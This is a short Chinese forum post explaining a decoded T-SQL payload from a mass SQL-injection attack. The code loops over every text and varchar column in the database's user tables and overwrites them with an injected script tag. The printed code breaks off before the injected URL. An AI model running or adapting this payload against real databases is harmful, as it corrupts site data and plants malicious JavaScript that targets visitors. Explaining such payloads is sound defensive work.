作者:linjiabin43 | 2023-09-01 19:50
注意:我的第一个解释是不正确的,因为我实际上没有读完整个事情......
这是翻译的内容.它在您的数据库中搜索text或varchar列(b.xtype in 99,35,231,167),然后将javascript文件注入数据库的所有文本列.比我初想的更恶意一点.
DECLARE
@T varchar(255),
@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT
FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
linjiabin43
这个屌丝很懒,什么也没留下!
京公网安备 11010802040832号 | 京ICP备19059560号-6 